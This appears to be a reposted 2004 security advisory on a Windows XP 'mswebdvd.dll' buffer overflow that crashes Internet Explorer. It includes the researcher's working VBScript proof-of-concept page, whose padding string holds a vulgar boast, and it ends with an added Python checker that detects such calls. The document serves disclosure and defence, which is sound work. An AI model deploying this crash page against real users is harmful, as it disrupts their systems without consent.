-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users
Deny Service
DATE: Apr 6 2004
IMPACT: Denial of service via network
EXPLOIT INCLUDED: YES
VERSION(s): XP SP1, SP2
DESCRIPTION: Rafel Ivgi (The-Insider) reported a vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user can cause denial
of service conditions.
It is reported that a remote user can create HTML that loads the
'MSWebDVD.MSWebDVD.1' active scripting object with specially crafted
parameters for the AcceptParentalLevelChange() function to cause the
target user's Internet Explorer browser to crash. According to the
report, setting the 'Password' parameter to a value longer than 255
characters triggers the flaw.
Some demonstration exploit HTML is provided in the Source Message.
Impact: A remote user can create HTML that, when loaded by the target
user, will cause the target user's Internet Explorer browser to crash.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/technet/security/
Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Message History: None.
Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors:
http://www.microsoft.com
Platforms: Windows XP Professional, SP1, SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web:
http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
== 1) Introduction ==
"mswebdvd.dll" is a module that allows watching DVD films from websites.
Using active scripting, an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
== 2) Bug ==
The "mswebdvd.dll" module does not correctly check the parameters that
are sent to the "AcceptParentalLevelChange" function. Therefore it is
possible to DoS/crash Internet Explorer remotely.
The function:
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean value), UserName as string,
Password as string
Setting the "Password" value to a string longer than 255 chars will
cause the overflow.
Unfortunately this vulnerability affects all Windows XP versions after
all patches and after SP1+SP2.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
= 3) The Code =
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
' Build a string far longer than 255 characters; the advisory reports that
' length as the trigger for the Password parameter. (VBScript string literals
' cannot span lines, so each concatenation is kept on a single line.)
dim mymy2,a
a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
a= a & "ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
a= a & "BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
a= a & "CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
a= a & "DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
a= a & "EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
a= a & "FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
a= a & "GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
a= a & "HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
a= a & "IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ"
a= a & "JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK"
a= a & "KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL"
a= a & "LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM"
a= a & "M1234567899876543211112222333344445555666677778888999998761234rafiisthekingofthebufferoverflowsoyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"
' Instantiate the control and call the affected method with the long
' string as the Password argument.
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a
</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Source:
http://www.securitytracker.com/aler...09673.html
Windows XP SP1 and SP2 have this vulnerability; for the moment there is
no solution available.
Ille Corvus. In Aeternum.
Deserving of filtering (Kill-file):
tella llop, jm (N.B. 2003.10.25)
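As an added, defender-side example that is not part of the advisory or of Rafel Ivgi's post: a small Python checker that statically inspects HTML of the shape shown above and flags a call to AcceptParentalLevelChange() on an MSWebDVD.MSWebDVD.1 object whose string argument exceeds the 255-character limit the advisory names. It evaluates only the VBScript subset the PoC uses (Dim, string literals, variables, `&` concatenation, `Set x = CreateObject(...)` and a sub call with comma-separated arguments); the function names `find_overlong_calls` and `build_sample`, and the sample page `build_sample` constructs, are mine and not from the original.

```python
"""Static check for HTML that drives the MSWebDVD.MSWebDVD.1 control with an
over-long AcceptParentalLevelChange() string argument.  Added example, not
code from the advisory or its author."""
import re

PROGID = "MSWebDVD.MSWebDVD.1"
METHOD = "acceptparentallevelchange"   # compared case-insensitively, as VBScript does
LIMIT = 255                            # longest Password value the advisory reports as safe

SCRIPT_RE = re.compile(r"<script[^>]*vbscript[^>]*>(.*?)</script>", re.I | re.S)
CREATE_RE = re.compile(r'^set\s+(\w+)\s*=\s*createobject\s*\(\s*"([^"]+)"\s*\)', re.I)
CALL_RE = re.compile(r"^(\w+)\.(\w+)\s*\(?(.*?)\)?$")
ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")


def _split_outside_quotes(text, sep):
    """Split on `sep` only where it is not inside a double-quoted literal."""
    parts, buf, in_str = [], [], False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts]


def _eval_expr(expr, env):
    """Evaluate a literal / variable / '&' expression; None if it uses anything else."""
    tokens = _split_outside_quotes(expr, "&")
    if len(tokens) == 1 and tokens[0].lower() in ("true", "false"):
        return tokens[0].lower() == "true"
    result = ""
    for tok in tokens:
        if len(tok) >= 2 and tok.startswith('"') and tok.endswith('"'):
            result += tok[1:-1].replace('""', '"')   # VBScript escapes " as ""
        elif tok.lower() in env:
            result += str(env[tok.lower()])          # identifiers are case-insensitive
        else:
            return None
    return result


def find_overlong_calls(html, limit=LIMIT):
    """Return one finding per AcceptParentalLevelChange() call on an
    MSWebDVD.MSWebDVD.1 object whose string argument is longer than `limit`."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        env, objects = {}, {}   # variable -> value, variable -> ProgID it was created from
        for raw in script.splitlines():
            line = raw.strip()
            if not line or line.startswith("'") or line.lower().startswith("dim "):
                continue
            if m := CREATE_RE.match(line):
                objects[m.group(1).lower()] = m.group(2)
            elif (m := CALL_RE.match(line)) and m.group(1).lower() in objects:
                if objects[m.group(1).lower()] != PROGID or m.group(2).lower() != METHOD:
                    continue
                for idx, arg in enumerate(_split_outside_quotes(m.group(3), ",")):
                    value = _eval_expr(arg, env)
                    if isinstance(value, str) and len(value) > limit:
                        findings.append({"object": m.group(1), "method": m.group(2),
                                         "arg": idx, "length": len(value)})
            elif m := ASSIGN_RE.match(line):
                value = _eval_expr(m.group(2), env)
                if value is not None:
                    env[m.group(1).lower()] = value
    return findings


def build_sample(password_length):
    """Constructed test page shaped like the advisory's PoC (not the original PoC)
    whose Password argument has exactly `password_length` characters."""
    body = ["dim obj, a", 'a=""']
    remaining = password_length
    while remaining > 0:
        chunk = min(remaining, 100)
        body.append('a= a & "' + "B" * chunk + '"')
        remaining -= chunk
    body.append('Set obj= CreateObject("MSWebDVD.MSWebDVD.1")')
    body.append('obj.AcceptParentalLevelChange False, "user", a')
    return ("<html><body><script language=vbscript>\n"
            + "\n".join(body) + "\n</script></body></html>")


if __name__ == "__main__":
    for n in (255, 300):
        print(n, find_overlong_calls(build_sample(n)))
```

The checker is deliberately literal: it only understands the constructs the PoC uses, and anything it cannot evaluate (a function call, an expression it does not model) is treated as unknown rather than guessed, so it reports no finding for that argument. Run it over a suspect page or a proxy-captured HTML body; a non-empty result means a script builds a string longer than 255 characters and hands it to the affected method.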